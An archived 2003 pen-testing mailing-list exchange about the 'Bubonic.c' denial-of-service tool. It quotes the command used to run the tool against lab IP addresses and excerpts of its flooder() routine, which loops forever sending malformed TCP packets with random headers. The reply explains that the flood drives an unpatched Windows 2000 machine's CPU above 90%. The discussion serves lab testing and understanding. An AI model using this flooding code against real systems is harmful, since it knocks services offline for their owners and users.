> -----Original Message----- > From: Indian Tiger [mailto:indiantigerat_private] > Sent: Thursday, February 06, 2003 18:43 > To: pen-testat_private > Cc: silat_private > Subject: Bubonic DoS tool > > > Hi All, > > I was testing the "Bubonic.c lame DoS against Windows 2000 > machines and > certain versions of Linux in a test scenario over Linux 8.0. > I have compiled > it's source code and running it's binary as follows: > # ./bubonic 10.3.10.22 10.3.8.70 100 1000 > On executing the above command, there was no observable > immediate effect, > but the Hub was showing the collisions (which were the Red > Steady). Etherial > shows the packets routed to desination. > But after executing the command the destination machine must be > blocked/freeze, but it's not happening. The code is very easy to understand. The "interesting" part is in flooder(), my comments inline: void flooder(void) { ... packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = rand(); ... packet.tcp.th_flags = random(); packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 0; packet.tcp.th_urp = random(); packet.tcp.th_dport = random(); ... cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); ... for(i=0;;++i) { ... if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } To sum up and simplify, this sends TCP packets with bad header. As a result, my unpatched win2k's CPU graph stays over 90% in the kernel, causing Albinoni to sound bad. Best Regards, Yonatan Bokovza IT Security Consultant Xpert Systems ---------------------------------------------------------------------------- Are your vulnerability scans producing just another report? Manage the entire remediation process with StillSecure VAM's Vulnerability Repair Workflow. Download a free 15-day trial: http://www2.stillsecure.com/download/sf_vuln_list.html
This archive was generated by hypermail 2b30 : Tue Mar 11 2003 - 09:12:33 PST